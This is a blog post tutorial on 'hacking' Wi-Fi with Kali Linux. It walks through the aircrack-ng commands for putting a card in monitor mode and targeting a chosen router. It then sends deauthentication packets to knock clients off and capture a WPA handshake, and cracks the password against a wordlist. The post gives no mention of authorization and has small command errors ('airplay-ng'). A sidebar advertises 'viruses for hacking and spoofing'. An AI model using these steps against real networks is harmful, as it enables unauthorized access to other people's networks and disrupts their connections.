HOW TO HACK WI-FI USING KALI LINUX .


In all my previous blog's there is all information about the how to use KALI LINUX in virtual box or how to use it live using virtual box or using with a live bootable disk but that part is over now and after wards ill ony post about how to use KALI  LINUX  .In which ill cover all applications present in KALI  LINUX .

In this blog we will talk about HOW TO HACK WI FI USING KALI  LINUX.

There are many ways to hack WI-FI using KALI  LINUX like  Aircrack-ng , Reaver , Pixiewps , Wifite , Wireshark , oclHashcat , Fern Wifi Cracker ,  Wash , Crunch , Macchanger .

In this blog ill show you To crack WI-fI Using Aircrack-ng .
  • In KALI LINUX open Terminal.



  • Then type airmon-ng in the Terminal and press Enter.And note the Interface name.


  •  Then type airmon-ng start (Interface Name) and press Enter . 


  • Now your monitor mode will enable now type airodump-ng (Interface Name)And then press Enter.


  • As we have to hack only one WiFi so select one and then  type this airodump-ng  -c  (channel no can be shown under the heading CH)  -- bssid (Bssid of the router you want to hack) -w /root/Desktop/(space) (Interface Name) Then press Enter.



  • Then open a new terminal.


  • Then write the following code airplay-ng -0 0 -a (Bssid of router ) -c (Bssid written below station or client bssid ).  Then press Enter.



  • Deauthentication process will start and you have to wait till you got Handshake File.After that close the window where Deauthentication is happening.


  • Then press Ctrl+c to stop process and then write aircrack-ng -a2 -b (bssid of router) -w (drag the word list after that) Then drag the capture file to the Terminal.(DOWNLOAD WORD LIST)


  • Then aircrack-ng will start its work to find the key wait for the key to be found.





** SOME BASIC INSTRUCTIONS TO HELP YOU 





##AS THIS METHOD SOMETIMES DID'T WORK SO
ANOTHER WAY TO HACK WI-FI SOON THAT'S THE GRAPHICAL VERSION IN WHICH YOU DON'T HAVE TO WRITE ANY CODES . SO TILL THEN ENJOY THIS ONE .


**PLEASE NOTE THAT YOUR WI-FI CARD SUPPORTS MONITOR MODE AND INJECTION MODE AND OTHER ASPECTS FOR WI-FI HACKING USING KALI LINUX.

THAT IS MOST FACED PROBLEM BY USERS.OR USE AN EXTERNAL WI-FI CARD THAT SUPPORTS ALL THESE MODES FOR THE USE OF WI-FI HACKING.


**FOR ANY QUERY OR PROBLEM COMMENT DOWN BELOW I'LL TRY TO ANSWER THAT IN A DAY.

Comments

POPULAR ONES

HOW TO HACK WI-FI USING FERM WI-FI CRACKER

A GIFT FOR YOU ALL .( VIRUSES FOR HACKING AND SPOOFING )